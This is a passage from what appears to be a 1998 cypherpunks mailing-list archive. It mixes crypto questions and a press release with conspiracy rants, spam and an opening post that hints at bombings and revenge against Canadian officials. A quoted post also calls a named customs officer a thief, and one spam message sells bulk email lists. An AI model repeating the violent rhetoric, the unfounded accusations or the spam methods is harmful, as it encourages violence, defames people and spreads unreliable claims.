personal propery would likely be regarded as a hero, while a citizen who
shot and killed an ArmedCanadianGovernmentThug who was doing the same, 
would be the immediate subject of villification by all arms of Canadian
Opinon/Reality Creating Agencies, my own preference is to set a goal of
returning (1,000)Tit-for-(1)Tat.
  Being, as I say, a pretty conservative fellow, I have refrained, for
the most part, over the years, from extracting a large measure of revenge
or retribution for the unethical and illegal TravestiesOfJustice that I
have been subjected to by various CanadianAuthorities. Having gone to 
great lengths to act with reason and civility in the face of oppression
and persecution for quite some length of time, and at considerable 
personal expense to both my finances and my psyche, I can see no reason
to have any qualms of conscience in regard to henceforth requiring 
AThousandEyesForAnEye (TM) as a BalanceOfPayments for acts of thievery
and illegality against my person by ArmedCanadianGovernmentThugs.

  Naturally, if anyone feels that they can offer good, solid advice in
regard to why it might be more ethical or justified for me to just keep
on TakingItInTheAssTimeAndTimeAgain without complaint or retribution,
then I would be more than happy to forward them some advice I received
from S.M. Halloran, who works as a Biochemical Researcher at a Spooky
Drug Laboratory in AssassAnkara, Turkey:
    _________________________________________________________________
     * To: cypherpunks@Algebra.COM
     * From: "S. M. Halloran" <mitch@duzen.com.tr>
     * Organization: User RFC 822- and 1123-compliant
     _________________________________________________________________
   
ou are a lunatic.  No question about it.

Can you possibly make an appointment with your doctor and make sure your
lithium dose is not greater than it ought to be?
Mitch Halloran
Research (Bio)chemist
Duzen Laboratories Group
AssassAnkara   TURKE mitch@duzen.com.tr
    _________________________________________________________________
  

  I have been following, with great mirth, a current thread on the CPUNX
list which expresses great concern over the possible implications to the
issues of freedom and privacy by the plans of the Russian Government
and/or Military implimenting a StateOfTheArt Monitoring/Surveillance
System designed to make BigWolfInBigGrandmothersClothing's ears very, 
very large indeed. 
[WAS: "The better to hear EveryOneAndEveryThing with."]

  I find it interesting that there should be such great concern over the
possibility of EvilThings happening in Russia that are already happening
in AmeriKaKa, when few Citizens or NetIzens in this country seem to be
inclined to actually *do* anything in regard to making an effort to hold
accountable those involved in the unethical and criminal persecution of 
our own DigitalPrisonersOfWar behind Amerika's ElectroMagnetic Curtain.
  What reason is their to be 'concerned' about matters that one is going
to submissively submit to like a LemmingLamb waiting to rush over the
cliff and into the BigMouthBigTeeth of BigBrother?


  James Dalton Bell got RailRoaded, ScrewedBluedAndTattoo'd, SetUp, Fucked
Over, and SoldDownTheFuckingRiver for the diabolical crime of openly
discussing the same types of concepts and issues that our Founding Fathers
wrote about (although they were taking their medication regularly and had
the good sense to publish much of their work via anonymous reprinters).

  ALunaticWhoLooksALotLikeMe got HisorHer computers, and those of family
members, confiscated, HisOrHer Sympatico WebSite deleted, and subjected
to the threat of years of imprisonment, as a result of putting up an
'RCMP HATE PAGE' parody dedicated the belief that making fun of Dudley
DoRight's abuse, persecution and murder of human beings of Native American
ancestry was less of a crime than the actual performance of those types
of criminal misdeeds.

  Unless one is prepared to actually take action to prevent the abuse of
authority, and to hold those responsible for high-handed, unethical and
illegal actions against the Citizens, then the process of 'discussion'
on these issues is mere Philosophical Masturbation.
  
The rEvolution is NOW!
All that really needs to be said, is "BOOM!"

NEWS FLASH!!!
If, after someone ButtFucks you, you give them a really great BlowJob,
they don't have a whole lot of incentive not to do it again.
If the CriminalFuckers are incapable of understanding that "NO Means NO"
then perhaps they are capable of understanding that "BOOM Means NO."


  The willingness of WeTheSheeple to submissivly submit to the atrocious
lies, abuses, criminal and unethical behavior of the Rulers&Contollers
can be explained, to my mind, by nothing other than BrainWashing.
  The Truth (TM) of the matter is, the ThugsAndThieves who are in control
of this and other countries, are, for the most part, GutLessCowards who
are capable of maintaining their intrusive and excessive hold over the
lives of the citizenry only by virtue of OrganizedMobRuleOfForce over
a ComplacentCitizenry.
  Upon losing the support system of OfficiallyAuthorizedOrganizedCrime,
most of these GutLessCowards fold like a BustedFlush. On the extremely
rare occassions where the GutLessCowards are called to account for their
criminal behavior and abuse of power, They turn in mass fear on one
another, until they have spilled enough of each other's blood, and hacked
off enough internal heads, that the citizens are appeased.

  et the MindsOfTheMasses have become so controlled by the PuppetMasters
that, after brief displays of sanity and integrity, they again accept the
dichotomic exhortations of the LeftOverLiars&Thieves that everything is 
now "Different/BackToNormal."

  "We stopped destroying the minds of unwitting victims of our criminal
mind-control experiments esterDay (TM). The IRS is going to cease
engaging in high-handed, unethical abuse of the citizens Tomorrow (TM)."

The Reason The Government Is Incapable of Dealing With The Present:
"The rEvolution is NOW!"

  "The President you elected has been murdered, but you will not be 
allowed to know why, or by whom. That is TopSecret information that
can only be accessed by those who may have been involved in his murder."

  "We don't have the time or resources to bring to Justice all of the
important and politically connected people who became grotesquely rich
while illegally draining BillionsOfDollars from the Savings and Loan
system, but we *do* have the time and resources to imprison millions
of DarkSkinnedAmericans (and a few LightSkinnedAmericans) for willingly
ingesting pharmecutical substances which our own agents illegally put
into the bodies of *unwilling* people, without a single one of them
being subject to criminal proceedings, even when their actions caused
the death of their unwitting victims."

  "es, we Fucked Jim Bell Silly! So the fuck what?
  "We got away with it, didn't we? So you can bet your sweet ass that
we're going to do it again, and again, at any time we please, and to 
whoever we please.
  "If you DumbSchmucks want to sit by placidly while we pick you off
OneAtATime, then it doesn't really matter that we're GutLessCowardlyFucks,
does it?"









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angie Elder <ajelder@dylan.imation.com>
Date: Mon, 27 Jul 1998 10:28:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: MORE
Message-ID: <3.0.32.19980727102706.00912150@dylan.luminous.com>
MIME-Version: 1.0
Content-Type: text/plain


More




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@m7.sprynet.com>
Date: Mon, 27 Jul 1998 11:05:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: encrypted FM radio hiss
Message-ID: <3.0.5.32.19980727110437.007b8100@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



On the subject of RNGs.  Thinking about conditioning.
	
Suppose you have a "poor" random number stream, e.g., FM hiss digitized at
say 8 Ksamples/sec.  Can you get a crypto-secure random-number stream by
"whitening" the stream with a good block cipher?

This scheme uses the RNG to "kick" the cipher out of the deterministic
cycle its in, which is determined by the cipher key and initialialization
vector.

Poor RNG ----> XOR ----> BlockCipher ----> improved RNG?
                 ^                    |
                 |____________________|

The output of a good block cipher in feedback mode will pass Diehard tests,
though it is not crypto-secure.

>From an information theoretic perspective, in the above scheme, you are
slowly adding entropy to the output stream, at a rate determined by the
actual number of bits/iteration and the bits/symbol of your poor random
numbers.

If you fed 64 bits of pure random values into a 64 bit cipher you would have
a true RNG, filtered by the xor/ciphering, but still crypto-secure.  With
fewer true bits, you have a 'smooth' way to introduce variable amounts of
true entropy.
If your RNG is 'stuck at' a constant value you are back to a deterministic
PRNG.

How do you cryptanalze the mix of a keyed PRNG and a true entropy source here?

Is there any mathematical literature on this?

Thanks



honig@alum.mit.edu

   "Speech is not protected simply because it is written in a language"	
	Federal Misjudge Gwin on the Bernstein Case









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 11:25:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: MItSchill Millhouse Holler'in
Message-ID: <009C9CD9.EB1F5DC0.23@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mitch Halloran, unwitting schill of the TrilateralCPU, digitized:
 
> I neglected to take into consideration that this attempt at 
> revisionist history of the greatest President of the US in the 
> 20th Century, perhaps in US history...this raving and ranting 
> to take the name of FDR in vain...this dribble to take all of 
> humanity's name in vain...this project to develop the Mother 
> of All Conspiracy Theories, including figuring out a way to 
> show the Big Bang is/was, all of it, every last bit, a 
> conspiracy...
 
> ...well, it could be ciphertext for which I have not received 
> the key for making into plaintext.  Someone please forward the 
> key to me.
 
  Working in a Drug Lab, I would imagine that the key required
to make sense of SPACE ALIENS HIDE MY DRUGS!!! is easily within
reach...check the 500 ml beaker to your immediate left...
 
  To tell the truth, most of my ranting and raving in regard
to the InfernalTruths EreuIndicted in SAHMD is done out of
kindness towards those who are the target of both my BarbLess
Wit and my WitLess Barbs, since merely revealing the NakedTruth
about many of these individuals might result in the Reader 
having an eye put out, although HeOrShe would still have one
good eye left to see that the person who was giving rise to 
the BluntNosed Sword of Truth was not the individual's wife.
 
  ReVisionIst, to me, indicates someone who takes another look
at what was previously seen with the aid of colour-glossy photos
and pie-charts provided by the people who threatened to imprison
your parents if they failed to send you to government-sponsered
IndoctrinationCamps justified under the ruse of FreeEducation,
which sometimes seem mostly geared for reinforcing in our minds
how lucky we are to live in a country where the government is
kind enough to provide us with FreeIncomeTaxReturnForms.
 
  Son of Mother Of All Chapters, as presented to the CypherPunks
list, quite simply provides a plethora of Official Versions of
the events surrounding the murder of one of Franklin Roosevelt's
political enemies, Anton Cermak.
  Those perusing the material may come to the conclusion that
if a wide variety of official news sources and official law
enforcement agencies don't seem to have a fucking clue as to
the time, date or sequence of events surrounding the murder,
the death of Cermak, the trial or the execution, then perhaps
one would be remiss in too hasty in accepting the same people's
conclusions that Roosevelt, and not Cermak, was the target, it
would be hard to fault their logic.
 
  As far as Roosevelt, or anyone else, being "the greatest
President" of any era, it would be more accurate to describe
their being the GreatestBullShitter of the era, or of having
the GreatestAdvertising/SpinDoctor/PoliticalThugs of the era.
 
  It is a matter of speculation to what extent Roosevelt's 
actions were responsible for the recovery of the American
economy after the collapse of the banking sector, but it is 
a matter of *fact*, supported by the testimony of even those
who were part of FDR's political entourage, that Roosevelt
took steps to ensure the *complete* collapse of America's
financial institutions while Hoover was still President,
in order to put himself in a position to extort as much
money and power as possible out of Congress. 
  Perhaps the massive suffering and financial losses that
he caused in his power-grab might be justified as being
'for the greater good,' except that, had he used his position
as President-elect to help restore confidence in the economy,
instead of destroying it, America would not have required
nearly as much 'saving' as it subsequently needed.
 
  It is a shame that I had not been born in an age when I
could have run for President against Roosevelt, and won.
  Had I done so, then I, like FDR, would have granted 
myself a license to print money, and I also would have
spent three times as much of the taxpayer's money as the
previous 31 Presidents, combined, but *I* would have spent
it all on beer and scotch, thus resurrecting the American
economy without creating a HugeGovernmentMonster filled
with political patronage appointees and employees who I
had bought and owned with imaginary money that taxpayers
would be responsible for repaying.
  Also, being drunk all of the time, there would have been
little chance of me turning America into a PlannedSociety
via a New Deal in which all of the cards being dealt were 
Red.
 
> By the way, I'm really one of you guys.  I am just working a 
> cover among the people who call themselves sane until you guys 
> who really know the truth can get into a position reveal these 
> eternal truths to the unbelievers.  he-he!
 
  We appreciate your efforts. Due to the limited space in
the HomeForTheCriminallyInsane, it is important for us to
have half-witting schills secretly infiltrating organizations
which are too ignorant of Truth&Reality (TM) to realize that
the NewCrayolaColours are part of the WorldWide Plot, even
when spelled without the 'u.'
 
~
ICould'aBeenAContend'aMonger
~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goorio82@msn.com (ld)
Date: Mon, 27 Jul 1998 08:35:49 -0700 (PDT)
To: goorio82@msn.com
Subject: 7.8 cents/min. Long Distance & 800
Message-ID: <199807272529NAA22376@post.qc.ca>
MIME-Version: 1.0
Content-Type: text/plain


Act now! 10 cents per minute IS NOT good enough anymore.

.078 CENTS PER MINUTE for Long Distance, 800 Service,
and Cellular Long Distance, and ONLY .012Min for Call Card.

6 Second Call Rounding.

No Setup Fee's or Monthly Charges.

Sign Up Now on-line at http://www.aptg.com

or contact us at sales@aptg.com

FACT:  .078 IS 22% LESS THAN .10/MINUTE, AND
48% LESS THAN .15/MIN.

Special promotion: If you sign up now you will receive 
90 days of FREE WEBSITE HOSTING SERVICES
through our affiliated company Znetwork. For details
go to:

http://www.znetwork.net/freeweb.htm
******************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "S. M. Halloran" <mitch@duzen.com.tr>
Date: Mon, 27 Jul 1998 01:56:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: The Plot
In-Reply-To: <009C9C13.3FFFC220.15@west.cscwc.pima.edu>
Message-ID: <199807270750.KAA15929@ankara.192.168.3.5>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> 2. Presidents and other political figures seem to die at
>   particular junctures of time wherein they have already
>   served their purpose to the Controllers. (Note: 'die'
>   either physically or politically.
>     i.e. - FDR croaking shortly after getting Truman
>     elected as the hand-picked replacement of shadowy
>     figures.
> 
> 3. Ronald Reagan and FDR were both 'front men' for their
>   wives, and/or those in their wives shadowy background.
>     FDR, through the efforts of Elanor and her cohorts,
>    was paid A QUARTER OF A MILLION DOLLARS in order to
>    enter the New ork governor's race.

If Linda finds out that you have hacked her mail account and are using it 
as a platform in which to be bizarre beyond belief, she just might have 
the wherewithal to track you down to the ends of the earth and give us all 
cause to believe your demise is yet another conspiracy among those you 
have already listed. :)


Mitch Halloran
Research (Bio)chemist
Duzen Laboratories Group
Ankara   TURKEY
mitch@duzen.com.tr

Happiness is an activity of the soul in accordance with perfect virtue
--from one translation of Aristotle's Nichomachean Ethics





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 27 Jul 1998 10:22:55 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 27, 1998
Message-ID: <199807271659.LAA17200@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Sun, 26 Jul 1998 21:13:48 -0700 (PDT)
To: Bob Cummings <0_rcummi@funrsc.fairfield.edu>
Subject: enc....
In-Reply-To: <Pine.ULT.3.95.980724104930.3180D-100000@funrsc.fairfield.edu>
Message-ID: <Pine.GSO.3.96.980727120710.21950A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


Is it cheaper to install an encryption software
than an encryption hardware?

Will encryption reduce the speed of my pc?

A virus uses encryption to hide itself (correct?),
but will the files in a pc be safe from virus when encrypted? why?

(Correct me if I'm wrong) It is easier to crack (let us say) a 56 bit
technique than a 64 bit
(correct ?).
===============================================================================
You give the words  you have spoken,
   it is not lended and are not taken back.
It is like what The Corrs sung "...your forgiven not forgotten...."

bbt@mudspring.uplb.edu.ph
bbt@peak-two.uplb.edu.ph
metaphone@altavista.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Mon, 27 Jul 1998 09:29:27 -0700 (PDT)
To: kryz <chrisharwig@hetnet.nl>
Subject: Re: Fw: my thoughts for this list
In-Reply-To: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
Message-ID: <Pine.LNX.3.96.980727121434.10507A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Jul 1998, kryz wrote:

> I guess you mean PGP?
> Just have patience... maybe a little prayer will help.

And the other guy said ..
> > I have been getting this list for a few days. I subscribed to this list in
> > the hopes I could learn something about crypto, in particular the GPG
> > project.


GPG = GNU Privacy Guard.

GPG is a PGP work-a-like .. doesn't support RSA (yet) due to the patents,
but once they run out, GPG will use it. I think it uses Blowfish (and
CAST?) for the symmetric algorithms, and probably 3DES too. I dunno
about IDEA .. I have my doubts due to the patents. 


Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"..the isle is full of noises, sounds and sweet airs that give delight and
hurt not. Sometimes a thousand twangling instruments will hum about mine
ears, and sometimes voices.." Caliban, Shakespeare's "The Tempest"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nina Huupponen <Nina.Huupponen@DataFellows.com>
Date: Mon, 27 Jul 1998 04:35:27 -0700 (PDT)
To: F-Secure-Press-Global@DataFellows.com
Subject: Data Fellows Announces F-Secure Workstation Suite 3.0
Message-ID: <3.0.3.32.19980727124728.009eac60@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain


For immediate release
27 July 1998

DATA FELLOWS ANNOUNCES F-SECURE WORKSTATION SUITE 3.0

The World's First Suite Product with Strong Encryption Provides
Corporations with a Complete Security Solution 

HELSINKI, FINLAND, July 27, 1998  -- Data Fellows, a leading developer of
data security solutions, today announced F-Secure Workstation Suite. The
product provides a reliable and easy-to-manage solution for most data
security concerns of modern corporations. 

"F-Secure Workstation Suite provides centralized management of most
corporate security aspects," says Mr. Risto Siilasmaa, Chief Executive
Officer of Data Fellows. "It combines world-class protection against
malicious code with unobtrusive file and network encryption. F-Secure
Workstation Suite is easily integrated into the enterprise's management
system. The Suite is also totally unobtrusive for the corporate end-users."

F-Secure Workstation Suite is the only product to combine world-class 
anti-virus protection with strong encryption for network traffic and files
stored on the hard disk. Competing offerings from Network Associates and
Symantec are not available world-wide with strong encryption. They also
lack the centralized policy based management features announced for
F-Secure Workstation Suite 4.0.

Unparalleled Virus Protection

The components of F-Secure Workstation Suite utilize the absolute latest
technology in the field. Malicious code detection and removal is based on
the F-Secure Anti-Virus product line, the first anti-virus in the world to
use multiple scanning engines simultaneously through its revolutionary
CounterSign architecture. Its detection rates are unparalleled, and
automated updates to the whole network further enhance its reliability.

Real-Time File Encryption and IPsec-Based Network Encryption

F-Secure Workstation Suite is the only suite product currently available to
offer strong encryption all over the world. The product uses an encryption
key length of 128 bits or more. The administrator can choose from supported
algorithms, including RSA, 3DES and Blowfish. All the most widely used
authentication methods are supported.

Should the authorized user forget his/her password, the product also
contains a safe and easy administrative key retrieval function.

"The file encryption component of F-Secure Workstation Suite provides
real-time protection for confidential data. F-Secure FileCrypto
automatically encrypts all open and temporary files. Not only is encryption
completely unobtrusive to the end-user, but it is also extremely secure:
there is no way the user can accidentally store confidential information in
plain text," explains Mr. Siilasmaa.

F-Secure Workstation Suite's network encryption, F-Secure VPN+, is based on
the latest IPsec standards. The F-Secure VPN+ is fully scalable: it
contains three components (Client, Server and Gateway) which can be
combined to build all major types of virtual private networks. These
include connections between organizations and their partners, home offices,
or employees on the road. F-Secure VPN+ is also fully transparent to the
end-user, as it uses IP protocol at the network level, which is invisible
at the application level. The 
F-Secure Workstation Suite product contains the client component of 
F-Secure VPN+. The Server and Gateway components are available separately.

Availability

The first version of F-Secure Workstation Suite will operate in the
Microsoft Windows NT environment. The product will be available from the
Data Fellows resellers around the world in August 1998. Prices will start
from $68 per seat for a 100-user license. 

The 4.0 version will be available in early fourth quarter 1998. This
version will be a fully integrated, policy-based security solution, making
it possible to manage data security issues in accordance with the corporate
security policy. The product will be based on a three tier management
architecture with considerable scalability advantages in a large
organization. In addition to Microsoft Windows NT, it will also operate in
the Microsoft Windows 95 and Windows 98 environments. 

All users of F-Secure Workstation Suite 3.0 will receive a free upgrade to
the 4.0 version as it ships.

Easy-to-Use Management and Scalability

The installation of F-Secure Workstation Suite 4.0 requires no work at the
actual workstation, and no configuration from the end-user after the
installation. The entire corporate system can be managed centrally. Thus
the management of vital security issues is effective but completely
transparent to the end-user. F-Secure Workstation Suite supports the
industry-standard SNMP protocol, integrates with Microsoft Systems
Management Server (SMS) and will include agents for leading enterprise
management products, such as CA Unicenter, IBM Tivoli and HP OpenView.

F-Secure Workstation Suite 4.0 comes bundled with F-Secure Administrator, a
Pure Java based graphical console for managing the security policies for
the whole enterprise network.

About Data Fellows

Data Fellows is one of the world's leading developers of data security
products with offices in San Jose, California and Espoo, Finland. Its
groundbreaking F-Secure product family is a unique combination of globally
available strong encryption and revolutionary anti-virus software. The
integrated F-Secure product range provides complete security solutions for
enterprises of any size. It includes file encryption and IPsec
communication encryption products, VPN gateways, SSH based secure remote
management software, easy-to-use solutions for distributed DNS management,
and a full range of anti-virus products for workstations, servers and
gateways. Data Fellows is also the developer of the award winning F-PROT
Professional anti-virus product, the scanning engine of which is now an
integral part of the multi-engine structure of  F-Secure Anti-Virus.

Data Fellows is privately owned. Since its foundation in 1988, the
company's annual growth in net sales has been 90%. Data Fellows offers a
worldwide network of technical support, training and distribution in over
80 countries. Data Fellows belongs to an elite group of companies with a
triple-A rating from Dun&Bradstreet.

For further information, please contact

USA:
Data Fellows Inc.
Mr. Pirkka Palomaki, Product Manager
Tel. +1 408 938 6700, Fax  +1 408 938 6701
E-mail:  Pirkka.Palomaki@DataFellows.com

Finland:
Data Fellows Ltd.
Mr. Ari Hypponen, Director of Development				
Tel.  +358 9 859 900, Fax. +358 9 8599 0599
E-Mail:  Ari.Hypponen@DataFellows.com

or visit our web site at http://www.DataFellows.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 27 Jul 1998 10:01:03 -0700 (PDT)
To: "Linda Reed--PCC West Campus CSC" <lreed@west.cscwc.pima.edu>
Subject: Re: Quaint Customs Warning - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <199807271716.NAA07974@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 27 Jul 1998 08:08:53 MST, Linda Reed--PCC West Campus CSC wrote:

>Canadian Customs Warning - SPACE ALIENS HIDE MDRUGS!!!
>________________________________________________________

>
>  It is particularly important to be wary of entering through certain
>Customs ports, such as Regway, Saskatchewan, which have a long history
>of abuse of authority and criminal malefeasance.

>  Bill Mitchell, a Canadian Customs OffalSlur at the Regway port, has
>been known to steal thousands of dollars worth of goods from those passing
>through while he is on duty, while being extremely evasive when asked
>about the legality of his conduct, as well as being very inept at hiding
>the fact that he is a lying, scumbag piece of shit who is not intelligent
>enough to tell even halfway believable lies.

Linda, here is a tidbit of information that you might get interested in...

The National Firearms Association has several times put a leash and curbed thoses rabbid dogs.  They procure you with ample legal information; just to point out to any govt bully how, per the letter of the law, they are committing a criminal act and how they could get charged.  THe thing is, if somebody comes from the states, it is unlikely that a) he/she will know Kanadian law and b) she/he will lay criminal charges.  The pertaining Kanadian laws should be widespread in the USA and maybe a cross-border entity could exist to promote the proper conduct of govt bully?

In any case, I suggest you ask the NFA about the whole thing of goods confiscation and criminal charges at the border.  Recently, there was a US citizen that entered Kanada with a handgun in his toolbox in his car trunk.  Oh, what a mess.  Here in Kanada, where the good Liberal dictators are convinced that Man is an intrinsically rabbid animal that will kill as soon as he has the means to layed criminal charges and seized this poor US chap cars and belongings and put him in the klink for a while.  Of course, in the US, a handgun could legitimately be carried in your toolbox and it is normal not to think of it as a *big thing* (tm), so it is legitimate to not think of it at the moment of border crossing.  Anyways, that's it, what happenend happened.  The NFA, I think, is working on it.

My telling of the story is subject to all sort of distortions and should not be considered reliable...  :-)  Contact the NFA and the Canadian Firearms Digest home page for more details...

Canadian Firearms Digest:  http://www.sfn.saskatoon.sk.ca/
Dave Tomlinson: e-mail: nfadat@telusplanet.net
NFA Calgary e-mail: nfa_calgary@iname.com
Web site: http://nfa.ca/ 

Ciao

jfa








Jean-Francois Avon, Pierrefonds (Montreal), Canada

Unregistered Firearms in the hands of honest citizens: Liberty's Teeth
Strong Cryptographic tools in the hands of honest citizens: Liberty's Voice

He who beats his sword into a ploughshare will get coerced to plow for 
those who don't...

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Mon, 27 Jul 1998 08:54:31 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Bitch Spice/Miss Vagina 1998
Message-ID: <19980727132322.14543.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/27/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Mon, 27 Jul 1998 14:13:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: John Gilmore and the Great Internet Snake Drive
In-Reply-To: <3.0.3.32.19980720114859.009997f0@dave.bbn.com>
Message-ID: <19980727141055.63396@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, Jul 22, 1998 at 06:18:30AM -0700, John Gilmore wrote:
> > One lesson I plan to observe - don't encrypt known plaintext unless you
> > have to !
> 
> The EFF DES Cracker cracks more than just known plaintext (though it's
> the easy case).

It occurs to me that an interesting use for the eff des cracker would
be the following: since the government asserts that DES is safe, then
a DES encrypted archive of crypto code should be exportable.  So the
next time someone feels the need to export something that is currently
not exportable, simply encrypt it, along with some plaintext, with
DES, trash the key, export it, and send the plaintext and the
encrypted plaintext to the EFF...

This is not a practical use, but it would make an interesting test 
case in court.

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Your Yashy" <cons0005@*algonquinc.on.ca>
Date: Mon, 27 Jul 1998 11:35:30 -0700 (PDT)
To: PM-WIN@UA1VM.UA.EDU
Subject: Spam Help
Message-ID: <199807271834.OAA16760@deathstar.comnet.ca>
MIME-Version: 1.0
Content-Type: text/plain




  I was wondering if I could get some help setting up a filter. I'd 
liketo create a folder called "SPAM". Then all email that are in the 
spam folder, I would like forwarded to abuse@ <domain> that it 
was sent from. I'm using Pegasus Email 3.01b
thnx in advance.


"I, of course, deny I called judge Santiago Campos a FASCIST PIG"
-bill payne June 19, 1998








HTTP://www.comnet.ca/~yashy
100 YashDollars to first person to try every link.
(including links derived from links)
p.s. SPAM PROOF Email address. Remove the "*" to reply.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 27 Jul 1998 06:16:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199807271316.PAA14820@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone consider the possibility that the dude who
shot his way into the Capitol did so as a result of
his mental infirmities being _healed_ by DC water?

Has any family member been quoted as saying,
"Thank God! He's finally come to his senses."

JustWonderingMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Mon, 27 Jul 1998 09:52:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: anonymicer is not trustworthy
Message-ID: <19980727165008.4317.qmail@serek.arch.pwr.wroc.pl>
MIME-Version: 1.0
Content-Type: text/plain


http://anonymicer.home.ml.org/news
is not trustworthy.
none of the service.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ftwi@ftwioffice.com
Date: Mon, 27 Jul 1998 21:04:15 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: 1,500,000 EMAIL ADDRESSES - $15 !!!!
Message-ID: <199807280404.VAA06974@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


HERE IT IS!!  The earnings pontential you have been looking for!  We will 
provide you with 1.5 MILLION EMAIL ADDRESSES FOR ONLY $15. These are all 
fresh addresses with no duplications. They are all sorted and ready to be 
mailed. This is the best deal anywhere today for email lists!  Imagine 
selling a product for only $10 and getting only a 1/100 response. That's 
$150,000!!!  Money making plans, reports, lists, jewelry, art, etc. Whatever 
you wish to sell!  People are making millions of dollars right now by doing 
the same thing! That is why you get so much email from people selling you 
their product....it works! These 1.5 Million email addresses are yours to 
keep, so you can use them over and over and they can be downloaded right from 
the internet or sent by mail on disk....your choice. 

If you do not have a program capable of sending bulk email, don't worry! We 
also send you links to sites where you can download one for free! We will 
also show you how you can avoid using your ISP's SMTP mail server for mailing 
by using software that turns your personal computer into your very own 
personal mail server!

Simply print out and complete this order form and send it to us along with 
your check or money order made payable to: FTWI for only $15.  

Send addresses via (circle one):
     DOWNLOAD              MAIL (add $3 for shipping and handling)

Name: _____________________________
Street Address: ________________________City: _______________ 
State: ________________Zip:_____________
Phone number:__________________________
Email:_______________________________ 

Returned checks are subject to $25 NSF Fee


Send your order and payment to: 
FTWI. 
4019 Goldfinch, Ste. J
San Diego, CA 92103 

THANK YOU!!!

























































Thank you!!!


 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vicki28@uswest.com
Date: Mon, 27 Jul 1998 17:32:11 -0700 (PDT)
To: marvin@uswest.com
Subject: IN DEBT WE CAN HELP YOU!!!
Message-ID: <199807272323.SAA15776@charon.vitalimages.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE>

Subject: Re:  Are you in debt?


           If you are then we can help. Qualifying is now at your
fingertips and there are no long distance calls to make or travel
plans to arrange.

FREE loan evaluation:http://www.amesconsultants.com/ins/127.html


We are American Capital Mortgage Services, we specialize
